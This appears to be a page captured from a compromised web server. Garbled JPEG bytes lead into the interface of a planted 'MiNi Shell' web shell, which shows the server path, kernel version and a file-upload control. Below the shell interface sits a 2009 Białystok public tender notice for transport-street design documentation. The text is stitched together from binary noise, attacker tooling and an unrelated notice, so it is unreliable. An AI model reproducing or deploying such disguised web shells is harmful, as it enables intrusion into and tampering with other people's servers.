JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090928/334970-N-2009.html

<p class="kh_header"><b>Białystok: Wykonanie dokumentacji na : Poprawę jakości funkcjonowania systemu transportu publicznego Miasta Białegostoku- Etap III przebudowa i rozbudowa ciągu ulic: J.H. Dąbrowskiego, Al. J. Piłsudskiego, H. Sienkiewicza na odcinku od ul. Ogrodowej do ul. Białówny oraz budowę centrum przesiadkowego przy ulicy H. Sienkiewicza w rejonie rzeki Białej</b><br>
<b>Numer ogłoszenia: 334970 - 2009; data zamieszczenia: 28.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białystok , ul. Słonimska 1, 15-950 Białystok, woj. podlaskie, tel. 085 869 60 02, faks 085 869 62 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji na : Poprawę jakości funkcjonowania systemu transportu publicznego Miasta Białegostoku- Etap III przebudowa i rozbudowa ciągu ulic: J.H. Dąbrowskiego, Al. J. Piłsudskiego, H. Sienkiewicza na odcinku od ul. Ogrodowej do ul. Białówny oraz budowę centrum przesiadkowego przy ulicy H. Sienkiewicza w rejonie rzeki Białej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: 
a)	  Wykonanie dokumentacji na : Poprawę jakości funkcjonowania systemu transportu publicznego Miasta Białegostoku- Etap III przebudowa i rozbudowa ciągu ulic: J.H. Dąbrowskiego, Al. J. Piłsudskiego, H. Sienkiewicza na odcinku od ul. Ogrodowej do ul. Białówny oraz budowę centrum przesiadkowego przy ulicy H. Sienkiewicza w rejonie rzeki Białej, wraz z budową i przebudową niezbędną infrastrukturą.

     2. Zakres prac obejmuje następujące elementy:
Wszystkie niezbędne projekty branżowe wynikające z zakresu zamówienia oraz decyzji o środowiskowych uwarunkowaniach przedsięwzięcia. Należy przewidzieć możliwość etapowania inwestycji w sposób umożliwiający uzyskanie efektu komunikacyjnego.
1.	Projekt budowlany spełniający wymagania formalno - prawne, sporządzony na mapie z nakładką katastralną (ewidencyjną) składający się z następujących części:
1.1	Projekt zagospodarowania terenu. 
      1.2 Projekt architektoniczno - budowlany z podziałem na:
	część drogową,
	część mostową,
	część branżową z projektami branżowymi infrastruktury technicznej drogowej, uzbrojenia inżynieryjnego, wynikającymi z obowiązujących przepisów, a także opracowaniem inwentaryzacji zieleni i projektu zieleni.
1.3	Dokumentacja geotechniczna (w zakresie niezbędnym dla projektu z siatką odwiertów
 co 50 m).
1.4	 Analiza i prognoza ruchu (w zakresie niezbędnym dla projektu).
1.5	 Projekt rozbiórki obiektów budowlanych (o ile zajdzie taka potrzeba).
1.6	Wyciąg z dokumentacji technicznej (projektów branżowych) krótko charakteryzujący zastosowane rozwiązania w poszczególnych branżach oraz planszy zbiorczej uzbrojenia. 
2.	Projekty wykonawcze opracowane na podstawie projektu budowlanego, z uwzględnieniem warunków zawartych w opiniach, uzgodnieniach oraz szczegółowych wytycznych dla poszczególnych branż.
3.	Projekt stałej organizacji ruchu i na czas budowy
4.	Projekt zabezpieczenia na czas robót urządzeń infrastruktury technicznej.
5.	Projekt technologii robót wraz ze szczegółowym harmonogramem wykonania.
6.	Szczegółowe specyfikacje techniczne wykonania i odbioru robót wszystkich branż,
7.	Przedmiary robót - zestawienie planowanych robót, w kolejności technologicznej ich wykonania, obliczenie i podanie ilości ustalonych jednostek przedmiarowych, wskazanie podstaw 
(w oparciu o SST) do ustalenia szczegółowego opisu robót, sporządzone na podstawie dokumentacji projektowej oraz Specyfikacji technicznych wykonania i odbioru robót.
8.	Materiały przetargowe dla potrzeb wyłonienia Wykonawcy robót, które powinny zawierać:
1)	projekt budowlany,
2)	szczegółowe specyfikacje techniczne wykonania i odbioru robót, 
3)	przedmiary robót i kosztorysy ślepe,
4)	kosztorys inwestorski.
9.	Wymagane opinie, uzgodnienia i sprawdzenia, rozwiązań projektowych w zakresie wynikającym z przepisów Ustawy - Prawo Budowlane z dn. 7.07.1994 r. rozdział 3, art. 20

      3. Określa się wymaganą ilość egzemplarzy poszczególnych części dokumentacji:

1. 	Wtórniki geodezyjne	kpl.	1
2.	Projekt do sporządzenia map podziału terenu	kpl.	5
3.	Wniosek o wydanie decyzji o środowiskowych uwarunkowaniach; - Karta informacyjna przedsięwzięcia, 
- Raport oddziaływania na środowisko.	kpl.	5
4.	Badania techniczne podłoża gruntowego i badania
laboratoryjne stanu technicznego nawierzchni	kpl.	5
5.	Projekt budowlany z projektem zagospodarowania terenu (oraz  Informacja o planie BIOZ) do wystąpienie o ZRID	kpl.	5
6.	Projekty wykonawcze branżowe: 	kpl.	po 5 egz. każdy
7.	SST dla całości opracowania ( + wersja elektroniczna)	kpl.	po 5
8.	Przedmiary i kosztorysy ślepe ( + wersja elektroniczna)	kpl.	5
9.	Kosztorysy inwestorskie	kpl.	2
10.	Projekt organizacji ruchu na czas budowy	kpl.	6
11.	Projekt stałej organizacji ruchu	kpl.	6
12.	Koszty uzgodnień i opinii	kpl. 	1
13.	Materiały przetargowe niezbędne do przeprowadzenia procedury przetargowej na wyłonienie Wykonawcy robót budowlano - montażowych,  wraz z wersją elektroniczną	kpl. 	5
14.	Wersja elektroniczna całości dokumentacji 	kpl. 	1
4.	Uwagi i wymagania szczegółowe:
      Opracowana dokumentacja powinna być dostarczona do UM w wersji papierowej i elektronicznej na płycie CD lub innym nośniku uzgodnionym z zamawiającym.

5. Do obowiązków wykonawcy objętych zakresem zamówienia należą również czynności związane z uzyskaniem i przygotowaniem wtórnika aktualnej mapy geodezyjnej, wykonaniem badań geologicznych oraz uzyskaniem warunków technicznych gestorów sieci, opinii i uzgodnień..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium o wartości  8 000,00  zł słownie złotych jeden  tysiąc<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki zawarte w art. 22 ust. 1 ustawy z dnia 29 styczna 2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655, Dz. U. z 2008 Nr 171, poz. 1058), tj.:
a)	posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
- dysponują osobami posiadającymi uprawnienia niezbędne do wykonywania prac objętych zamówieniem, wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane oraz przynależącymi do właściwej izby samorządu zawodowego, tj.: osobami posiadającymi uprawnienia budowlane  bez ograniczeń do projektowania w specjalnościach: konstrukcji mostowych (min. 1 osoba), drogowej (min. 1 osoba), instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych (min. 1 osoba), instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (min. 1 osoba) i muszą aktualnie przynależeć do właściwej Okręgowej Izby Inżynierów Budownictwa; każda z osób posiadających w/w uprawnienia powinna legitymować się min. 5 letnim stażem pracy w zawodzie na stanowisku projektanta;
-	zrealizowali w ostatnich 3 latach przed dniem wszczęcia postępowania o zamówieniu publicznym co najmniej dwa zamówienia na opracowanie dokumentacji projektowej na budowę lub przebudowę ulic minimum kl. Z z pełnym uzbrojeniem o długości min. 1000 mb.
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
posiadają potencjał finansowy pozwalający na realizację zamówienia przy założeniu, że zapłata będzie dokonywana etapami za każdy wykonany element dokumentacji projektowej w terminie 30 dni od daty potwierdzającej dostarczenie faktury Zamawiającemu, 
posiadają polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, na kwotę min. 200 000 zł 
d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie przepisów art. 24 ust. 1 i 2 ustawy z dnia 29 styczna 2004 r. Prawo zamówień publicznych.
2. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.
3. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	1.Dokumenty wymagane w ofercie:
2.	 1) formularz ofertowy (wg. załącznika nr 2 do SIWZ),
 2) tabelę opracowań projektowych ( załącznik nr 3 do SIWZ).

2. Dokumenty lub oświadczenia potwierdzające spełnienie warunków udziału w postępowaniu:
1.	  Oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu (przedstawione w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem przez wykonawcę): 
1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż na 6 miesięcy przed upływem terminu składania ofert;
2)	 oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22, ust. 1 pkt 1÷3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych i o nie podleganiu wykluczeniu z postępowania zgodnie z art. 24 ust. 1 i 2 (zgodnie z załącznikiem Nr 4 do SIWZ);
3)	polisa a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na  kwotę min. 200 000 zł ;
4)	wykaz co najmniej dwóch zamówień na opracowanie dokumentacji projektowej na budowę lub przebudowę ulic minimum kl. Z z pełnym uzbrojeniem o długości min. 1000 mb.  zrealizowanych przez Wykonawcę w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o zamówienie publiczne, a jeżeli okres prowadzenia jest krótszy - w tym okresie, z podaniem przedmiotu, dat wykonania i odbiorców wraz z załączonymi dokumentami potwierdzającymi, że usługi te zostały wykonane należycie, zgodnie z załącznikiem nr 5 do SIWZ - wraz z dołączonymi dokumentami (np.: listy referencyjne, zaświadczenia lub oświadczenia inwestorów, itp.) potwierdzającymi, że usługi te zostały wykonane należycie;
5)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawcą i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami dotyczącymi stażu pracy na stanowisku projektanta, uprawnień budowlanych niezbędnych do prowadzenia prac projektowych będących przedmiotem zamówienia (uprawnienia wymienione w rozdz. VI pkt 1 lit. b) SIWZ wraz z załączeniem tych uprawnień oraz aktualnych na dzień otwarcia ofert zaświadczeń o przynależności do właściwej izby samorządu zawodowego - zgodnie z załącznikiem nr 6 do SIWZ.
6)	pisemne zobowiązania innych podmiotów do udostępnienia osób niezbędnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 9), wykonawca wskazał osoby, którymi będzie dysponował zgodnie z załącznikiem nr 6a do SIWZ.

2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1)	Wykonawcy mogą wspólnie ubiegać się o zamówienie publiczne (dotyczy wspólników spółki cywilnej oraz konsorcjum). W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (pełnomocnictwo należy dołączyć do oferty).		
2)	Dokument pełnomocnictwa określający jego zakres powinien być przedłożony w oryginale lub kserokopii potwierdzonej za zgodność z oryginałem przez notariusza. 
3)	Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako reprezentant pozostałych - pełnomocnikiem.
4)	Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.
5)	Wypełniając formularz ofertowy oraz inne dokumenty powołujące się na Wykonawcę w miejscu nazwa i adres Wykonawcy należy wpisać dane dotyczące Wykonawców wspólnie ubiegających się o zamówienie.
6)Zamawiający będzie żądać od Wykonawcy, którego oferta została wybrana, przed podpisaniem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę podmiotów występujących wspólnie.
3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokumenty zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 188, poz. 1155).
4. Jeżeli wskazane osoby zgodnie z pkt 1 ppkt 5 są obywatelami państw członkowskich Unii Europejskiej, mając na względzie obowiązujące w Polsce przepisy prawa krajowego- ustawa z dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. z 2006 r. Nr 156, poz.1118 ze zm.), art. 12 pkt 7 w zw. z art. 12 a, możliwe jest uzyskanie przez te osoby decyzji w sprawie uznania kwalifikacji zawodowych w budownictwie nabytych w państwach członkowskich UE oraz wpisu do stosownej izby, po przeprowadzeniu właściwego postępowania weryfikacyjnego przez odpowiedni organ samorządu zawodowego w Polsce na zasadach określonych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( Dz. U. z 2008 r., Nr 63, poz. 394). 
5.  Zamawiający, na podstawie art. 26 ust. 3, wezwie wykonawców, którzy w terminie składania ofert nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 lub pełnomocnictw, bądź, którzy złożyli dokumenty zawierające błędy lub wadliwe pełnomocnictwa, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.bialystok.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Departament Inwestycji Urzędu Miejskiego w Białymstoku, Ul. Warszawska 21,  15-950 Białystok.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2009 godzina 08:45, miejsce: Departament Inwestycji Urzędu Miejskiego w Białymstoku, ul. Warszawska 21, pok. 300 (Sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com